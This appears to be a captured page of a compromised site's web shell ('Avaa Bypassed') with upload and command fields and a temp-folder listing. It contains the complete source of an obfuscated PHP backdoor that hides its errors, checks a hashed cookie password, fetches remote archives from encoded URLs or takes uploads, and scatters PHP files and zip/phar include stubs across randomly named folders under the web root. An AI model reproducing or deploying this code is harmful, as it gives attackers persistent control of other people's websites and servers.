[ Avaa Bypassed ]

Upload:

Command:

site89854@18.222.22.154: ~ $ 
<?php @ini_set('error_log',NULL);@error_reporting(0);@set_time_limit(0);if(function_exists("opcache_reset"))opcache_reset();@header("X-LiteSpeed-Purge: *");@header('X-LSCACHE: off');$c='ff3a816e23d69979ae6f8cae49aef3ea';function wp_die($e){die($e);}$g=!empty($_COOKIE['uid'])?$_COOKIE['uid']:$_REQUEST['uid'];if(empty($g)||md5(md5(sha1(md5(md5($g)))))!=$c)wp_die("p");function listFolders($h){$j=scandir($h);$k=array();foreach($j as $m){if($m=="."||$m=="..")continue;$q=$h."/".$m;if(is_dir($q)){$k[]=$q;$k=array_merge($k,listFolders($q));};}return $k;}function rstr($r=6){return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz'),1,$r);}function to($q,$u){$v=rand(0,count($q)-1);$w="1";if(!empty($_REQUEST['o']))$w=$_REQUEST['o'];$x=$q[$v]."/".rstr()."/";mkdir($x,0777,true);if($w=="1"){$x.="index.php";}elseif($w=="2"){$x.=rstr(5).".php";}elseif($w=="3"){$x.=$u;}return $x;}function d1($y){$z=@fopen($y,'r');$aa="";if(!$z)return false;stream_get_meta_data($z);while(!feof($z)){$aa.=fgets($z);}fclose($z);return $aa;}function d2($y){$bb=file_get_contents($y);if(empty($bb))d1($y);return $bb;}function fw($y,$q,$cc=null){if(file_put_contents($y,$q)){return true;}else{$dd=@FOPen($y,"w");if($dd){if(fwrite($dd,$q)||($cc!=null&&stream_copy_to_stream($cc,$dd))){@fClOsE($dd);return true;};}};return false;}function down($r,$ee){$gg=false;if(function_exists('curl_init')){$hh=curl_init($r);$z=fopen($ee,'w+');curl_setopt($hh,CURLOPT_FILE,$z);curl_setopt($hh,CURLOPT_TIMEOUT,50);if(curl_exec($hh)){$gg=true;}curl_close($hh);fclose($z);}else{$aa=d2($r);if($aa)$gg=fw($ee,$aa);}return $gg;}if(!empty($_REQUEST["l"])&&$_REQUEST["l"]=="a")wp_die(md5_file(__FILE__));$ii=$_SERVER['DOCUMENT_ROOT'];$jj=listFolders($ii);$cc=to($jj,"").".zip";if(!empty($_FILES['pluginzip'])){$cc=$_FILES['pluginzip']['tmp_name'];move_uploaded_file($_FILES['pluginzip']['tmp_name'],$cc);}elseif(!empty($_REQUEST["l"])){if(!down(gzuncompress(hex2bin($_REQUEST["l"])),$cc))wp_die("d");}elseif(!empty($_REQUEST['uid']))wp_die("<form method='post' enctype='multipart/form-data'><input type='file' name='pluginzip'><input type='submit'/>");$kk="";$ll=array();if(class_exists("ZipArchive")){$mm=new ZipArchive();if($mm->open($cc)!==TRUE)wp_die("z");for($v=0;$v<$mm->numFiles;$v++){$nn=$mm->getNameIndex($v);$z=$mm->getStream($nn);$ll[]=$nn;$oo=explode("/",$nn);$pp=end($oo);if($z){$qq=stream_get_contents($z);$rr=to($jj,$pp);$ss=str_replace($ii,"",$rr)."\n";if(fw($rr,$qq,$z)){echo $ss;};}}$mm->close();$kk='"zip://'.$cc.'#';}elseif(!empty($_REQUEST["n"])){$kk='"phar://'.$cc.'/';$ll=explode("|",gzuncompress(hex2bin($_REQUEST["n"])));foreach($ll as $tt){$qq=file_get_contents('phar://'.$cc.'/'.$tt);if($qq){$rr=to($jj,$tt);$ss=str_replace($ii,"",$rr)."\n";if(fw($rr,$qq)){echo $ss;};}}}if(!empty($kk)){$_REQUEST['o']=1;foreach($ll as $tt){$rr=to($jj,'');$qq='<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "'.$tt.'"; include('.$kk.'$h");?>';if(fw($rr,$qq))echo str_replace($ii,"",$rr)."\n";}}?>

Filemanager

DIR : / www/ sites/ 4/ site89854/ tmp/
Name Type Size Permission Actions
php4I1KIg File 184.3 KB 0600
phpTjVrJ4 File 184.3 KB 0600
phpbPAX2Q File 1.47 MB 0644
sess_FfpnL9 File 2.91 KB 0600
unix.110hW53H File 92.24 KB 0600
unix.110pmJre File 47.9 KB 0600
unix.11665wOC File 17.25 KB 0600
unix.11EcvCru File 109.18 KB 0600
unix.11Nf3FJw File 39.1 KB 0600
unix.11PL3usO File 28.64 KB 0600
unix.11T3nnSy File 49.56 KB 0600
unix.11Vjr7qF File 39.1 KB 0600
unix.11VnY9ci File 28.64 KB 0600
unix.11Z9Q8ad File 17.25 KB 0600
unix.11agzPYP File 109.18 KB 0600
unix.11gmXGAe File 49.56 KB 0600
unix.11ovfRnU File 92.24 KB 0600
unix.11t3mckX File 28.64 KB 0600
unix.11t7dqsV File 47.9 KB 0600
unix.11y7lRv7 File 28.89 KB 0600
unix.11yZdEq1 File 28.89 KB 0600
www.elektro-servis.eu.4bef78.tmp File 806 B 0644